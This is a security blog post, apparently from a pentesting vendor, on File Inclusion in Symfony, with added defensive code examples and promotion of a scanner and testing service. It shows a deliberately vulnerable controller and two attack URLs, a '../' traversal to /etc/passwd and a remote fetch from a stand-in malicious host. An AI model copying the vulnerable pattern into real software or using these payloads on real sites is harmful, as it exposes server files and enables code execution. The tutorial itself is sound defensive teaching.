File Inclusion Vulnerabilities are a common and critical security threat in modern PHP applications—including those built using the Symfony framework. If left unchecked, this vulnerability could allow attackers to access sensitive server files or execute malicious code, leading to a full system compromise.

In this post, we’ll explore how File Inclusion attacks happen in Symfony apps, how to prevent them, and how to test your own website with our Free Website Security Scanner. We’ll also provide Symfony-specific code examples, useful resources, and a link to our latest professional Web App Penetration Testing Service at Pentest Testing Corp.

Prevent File Inclusion in Symfony Apps

🛡️ Don’t forget to check out more security tutorials on our official blog at https://www.pentesttesting.com/blog/


🔍 What is a File Inclusion Vulnerability?

A File Inclusion vulnerability arises when user-controlled input decides which file the application opens. If that file is passed to include() or require(), PHP executes it, so an attacker who can point the path at a file they control gets code execution. If the file is only read, as with file_get_contents() or fopen(), the attacker gets arbitrary file read (path traversal): configuration files, .env secrets, source code. In PHP-based frameworks like Symfony this usually comes from concatenating an unvalidated request parameter into a filesystem path.

There are two types:

  • Local File Inclusion (LFI): loads a file already on the server, typically by traversing out of the intended directory with "../" sequences.
  • Remote File Inclusion (RFI): loads a file fetched from an attacker-controlled host. For include()/require() this needs allow_url_include = On (Off by default and deprecated since PHP 7.4); for stream functions such as file_get_contents() it needs only allow_url_fopen, which is On by default.

💥 Symfony Example of File Inclusion Vulnerability

Here’s a vulnerable Symfony controller that builds a filesystem path from user input without any validation:

// src/Controller/FileController.php
namespace App\Controller;

use Symfony\Bundle\FrameworkBundle\Controller\AbstractController;
use Symfony\Component\HttpFoundation\Request;
use Symfony\Component\HttpFoundation\Response;
use Symfony\Component\Routing\Annotation\Route;

class FileController extends AbstractController
{
    // Route declared here so the /include-file URLs below resolve (Symfony 5.2+ attribute syntax).
    #[Route('/include-file', name: 'include_file')]
    public function includeFile(Request $request): Response
    {
        // VULNERABLE: the raw ?page= value is interpolated into a path.
        // "../" sequences are not rejected, so the path can escape templates/pages/.
        $page = $request->query->get('page');
        $content = file_get_contents(__DIR__ . "/../../templates/pages/{$page}.html");

        return new Response($content);
    }
}

🛑 Why It’s Dangerous

An attacker can request:

http://example.com/include-file?page=../../../../etc/passwd

The "../" sequences walk out of templates/pages/ and the server reads whatever the resolved path points to. One caveat a tester should know: because the controller appends ".html", this exact payload resolves to /etc/passwd.html, and the %00 null-byte trick that once cut off such suffixes stopped working in PHP 5.3.4. On a current PHP build the attacker is therefore limited to files ending in .html, anywhere on the filesystem. Drop the suffix, or swap file_get_contents() for include(), and the same request returns /etc/passwd.

Or, with allow_url_fopen enabled (the default):

http://example.com/include-file?page=http://malicious-site.com/shell

Note which setting applies here: file_get_contents() follows allow_url_fopen, not allow_url_include, and the fetched body is returned to the browser rather than executed. The impact in this controller is server-side request forgery plus attacker-controlled HTML in your response. If the controller used include() and allow_url_include were On, the remote file would run as PHP on the server.

✅ How to Fix File Inclusion in Symfony

1. Whitelist Allowed Files

Accept only names from a fixed list. Pass true as the third argument to in_array() so the comparison is strict (no type juggling), and answer anything else with a 404:

$allowedPages = ['about', 'contact', 'home'];
$page = $request->query->get('page');

if (!in_array($page, $allowedPages, true)) {
    throw $this->createNotFoundException('Page not found');
}

// $page is now one of the three literals above, so the path cannot escape templates/pages/.
$content = file_get_contents(__DIR__ . "/../../templates/pages/{$page}.html");

2. Use Symfony Templating Safely

Instead of reading files by hand, render a Twig template with the controller's render() method. Twig's filesystem loader refuses to load templates outside its configured directories, which adds a second barrier, but the allow-list is still the primary control:

public function includeFile(Request $request): Response
{
    $page = $request->query->get('page');
    $allowedTemplates = ['about', 'contact', 'home'];

    if (!in_array($page, $allowedTemplates, true)) {
        throw $this->createNotFoundException('Page not found');
    }

    return $this->render("pages/{$page}.html.twig");
}
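Steps 1 and 2 combined in one controller. This is an added example, not code from the original post: the allow-list stays the primary control, and it adds a check the post does not show, canonicalising the resolved path with realpath() and refusing anything that lands outside the pages directory, so that a future change that weakens the list cannot silently reintroduce traversal. The PageController class, the route name and the helper resolvePagePath() are my own names; the templates/pages directory is the one used in the post.

```php
<?php
// src/Controller/PageController.php (added example, not from the original post)
declare(strict_types=1);

namespace App\Controller;

use Symfony\Bundle\FrameworkBundle\Controller\AbstractController;
use Symfony\Component\HttpFoundation\Request;
use Symfony\Component\HttpFoundation\Response;
use Symfony\Component\Routing\Annotation\Route; // Symfony 5.2 to 6.x; Attribute\Route on 6.4+

final class PageController extends AbstractController
{
    /** Primary control: the only page names this endpoint will ever serve. */
    private const ALLOWED_PAGES = ['home', 'about', 'contact'];

    #[Route('/include-file', name: 'include_file', methods: ['GET'])]
    public function includeFile(Request $request): Response
    {
        // InputBag::get() returns the default when the key is absent and throws a
        // 400 BadRequestException if an attacker sends page[]=... instead of a string.
        $page = (string) $request->query->get('page', 'home');

        if (!in_array($page, self::ALLOWED_PAGES, true)) {
            throw $this->createNotFoundException('Page not found');
        }

        $base = $this->getParameter('kernel.project_dir') . '/templates/pages';
        $path = self::resolvePagePath($base, $page);
        if ($path === null) {
            // Same message as above so the response does not reveal which check failed.
            throw $this->createNotFoundException('Page not found');
        }

        return new Response(file_get_contents($path));
    }

    /**
     * Defence in depth: resolve $base/$page.html to a canonical absolute path and
     * return it only if the file exists and sits inside $base. realpath() collapses
     * "..", "." and symlinks, so a name that slipped past the allow-list but still
     * escapes the directory is rejected here. Requires PHP 8.0 for str_starts_with().
     */
    public static function resolvePagePath(string $base, string $page): ?string
    {
        $realBase = realpath($base);
        $realPath = realpath($base . '/' . $page . '.html');

        if ($realBase === false || $realPath === false) {
            return null; // directory or file does not exist
        }
        if (!str_starts_with($realPath, $realBase . DIRECTORY_SEPARATOR)) {
            return null; // resolved to somewhere outside templates/pages/
        }

        return $realPath;
    }
}
```

With the list in place the realpath() check never fires for a legitimate request; it is there for the day someone replaces the list with a regex or a database lookup. A quick way to exercise it is a unit test that calls PageController::resolvePagePath() with a temporary directory and the names 'home', '../../etc/passwd' and a symlink pointing outside the directory, expecting a path only for the first.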

3. Disable Remote Includes (Recommended)

Set these in php.ini. Both directives are PHP_INI_SYSTEM, so ini_set() and .htaccess cannot change them, and PHP-FPM or the web server must be restarted afterwards:

allow_url_include = Off
allow_url_fopen = Off

allow_url_include is Off by default and deprecated since PHP 7.4; keep it that way. allow_url_fopen is On by default, and switching it off also blocks legitimate remote reads through file_get_contents() and fopen(), so confirm that no code depends on it first (code using curl or Symfony's HttpClient is unaffected). Verify the running values with php -i | grep allow_url, bearing in mind that the CLI and FPM can load different php.ini files.

🧪 Test Your Symfony App for File Inclusion (Free Tool)

Before attackers do, test your application with our Free Website Vulnerability Scanner Tool. It scans your site for common vulnerabilities, including file inclusion.

🖼️ Screenshot of the Website Vulnerability Scanner tool's homepage

Screenshot of the free tools webpage where you can access security assessment tools.

You’ll receive a detailed report with risk levels and remediation steps.

🖼️ Screenshot of a website vulnerability assessment report generated by the free tool to check Website Vulnerability.

An example of a vulnerability assessment report generated with our free tool, providing insights into possible vulnerabilities.


🧰 Additional Symfony Security Practices

Here are more Symfony-focused practices for avoiding file inclusion and similar issues:

1. Avoid Dynamic Includes

Do not build file paths from user input at all. Give each page its own route, or constrain the route placeholder to the known page names, and let the router and Twig resolve what to show; a request that matches no route is rejected before any controller code runs.
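One way to move the allow-list into the routing layer, as an added example that is not from the original post. The requirements option restricts the {page} placeholder to three literals, so a request such as /page/../../etc/passwd simply matches no route and Symfony answers 404 before the controller is invoked. The controller name, route name and template naming convention are assumptions.

```php
<?php
// src/Controller/StaticPageController.php (added example, not from the original post)
declare(strict_types=1);

namespace App\Controller;

use Symfony\Bundle\FrameworkBundle\Controller\AbstractController;
use Symfony\Component\HttpFoundation\Response;
use Symfony\Component\Routing\Annotation\Route; // Symfony 5.2 to 6.x; Attribute\Route on 6.4+

final class StaticPageController extends AbstractController
{
    /**
     * The requirement regex is compiled into the route pattern, so {page} can only
     * ever be "home", "about" or "contact". Slashes, "..", and URLs never match,
     * and the default placeholder rule already excludes "/" anyway.
     */
    #[Route(
        '/page/{page}',
        name: 'static_page',
        requirements: ['page' => 'home|about|contact'],
        methods: ['GET'],
    )]
    public function show(string $page): Response
    {
        // $page is guaranteed to be one of the three literals above, so using it
        // in the template name is safe. Twig's filesystem loader additionally
        // refuses to load templates outside its configured directories.
        return $this->render(sprintf('pages/%s.html.twig', $page));
    }
}
```

Generate links with the route name (path('static_page', {page: 'about'})) rather than hand-written URLs; if a page is later removed from the requirement, the URL generator throws instead of silently linking to a 404.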

2. Symfony Security Component

Symfony’s Security component handles authentication and authorization; it does not validate input, so it complements the allow-list rather than replacing it. Use access_control to make sure the page-serving route is only reachable by users who should see it. The anonymous firewall option below is Symfony 5 syntax; it was removed in 6.0, where every firewall accepts unauthenticated requests unless access_control says otherwise:

# config/packages/security.yaml
security:
    firewalls:
        main:
            anonymous: true   # Symfony 5.x only; drop this line on 6.0+
            # authenticators (form_login, http_basic, ...) go here
    access_control:
        # only authenticated users may reach the page endpoint from the example above
        - { path: ^/include-file, roles: ROLE_USER }

3. Validate Input Rigorously

Use Symfony’s Validator component (the Assert constraints) or custom validators. On PHP 8 prefer the attribute form shown here; the @Assert\Choice annotation form needs doctrine/annotations, is deprecated in Symfony 6.4 and is gone in 7.0. A constraint on a class only takes effect once the object is passed to the validator:

// src/Dto/PageRequest.php
namespace App\Dto;

use Symfony\Component\Validator\Constraints as Assert;

class PageRequest
{
    #[Assert\NotBlank]
    #[Assert\Choice(choices: ['home', 'about', 'contact'], message: 'Unknown page.')]
    public ?string $page = null;
}
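The constraints declared on PageRequest do nothing until an object is actually validated. The following controller, an added example rather than code from the original post, copies the query parameter onto the DTO, runs the injected ValidatorInterface, and renders only when there are no violations. It assumes PageRequest lives in src/Dto (namespace App\Dto); the controller name, route name and the choice of a generic 400 response are mine.

```php
<?php
// src/Controller/ValidatedPageController.php (added example, not from the original post)
declare(strict_types=1);

namespace App\Controller;

use App\Dto\PageRequest; // the PageRequest class from the section above, assumed to be in src/Dto
use Symfony\Bundle\FrameworkBundle\Controller\AbstractController;
use Symfony\Component\HttpFoundation\Request;
use Symfony\Component\HttpFoundation\Response;
use Symfony\Component\HttpKernel\Exception\BadRequestHttpException;
use Symfony\Component\Routing\Annotation\Route; // Symfony 5.2 to 6.x; Attribute\Route on 6.4+
use Symfony\Component\Validator\Validator\ValidatorInterface;

final class ValidatedPageController extends AbstractController
{
    #[Route('/page', name: 'validated_page', methods: ['GET'])]
    public function show(Request $request, ValidatorInterface $validator): Response
    {
        $dto = new PageRequest();
        // InputBag::get() already throws a 400 BadRequestException if page[]=... is sent,
        // so $dto->page is a scalar or null here; NotBlank then catches null and "".
        $dto->page = $request->query->get('page');

        // Run every constraint declared on PageRequest (NotBlank and Choice).
        $violations = $validator->validate($dto);

        if (count($violations) > 0) {
            // Generic response: do not echo the rejected value back to the client.
            throw new BadRequestHttpException('Invalid page parameter');
        }

        // After validation $dto->page is one of the literals in the Choice list,
        // so it is safe to use in the template name.
        return $this->render(sprintf('pages/%s.html.twig', $dto->page));
    }
}
```

On Symfony 6.3 and later the #[MapQueryString] controller argument attribute performs this mapping and validation for you and returns a 404 (or the status you configure) on violation; the explicit version above shows what that attribute does behind the scenes.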

🚀 Professional Web App Security Testing

If you're running a production Symfony application, it's crucial to perform deeper analysis beyond automated tools. We offer comprehensive Web Application Penetration Testing Services, where real ethical hackers assess your app using OWASP Top 10 and industry-standard techniques.

Our Service Includes:

  • Manual testing by cybersecurity experts
  • Detailed vulnerability reporting
  • Business risk assessment
  • Remediation verification

✅ Get a free consultation now via Web App Penetration Testing Services


📚 Learn More About Web App Security

For more tutorials, guides, and real-world security analysis, check out the Pentest Testing blog.


🧵 Final Thoughts

File Inclusion vulnerabilities in Symfony can be severe if not identified early. Always validate input against a fixed list, use the router and Twig instead of hand-built file paths, keep allow_url_include off, and test your application routinely, both with automated tools like ours and with manual review.

Secure coding practices + proper testing = a safer web.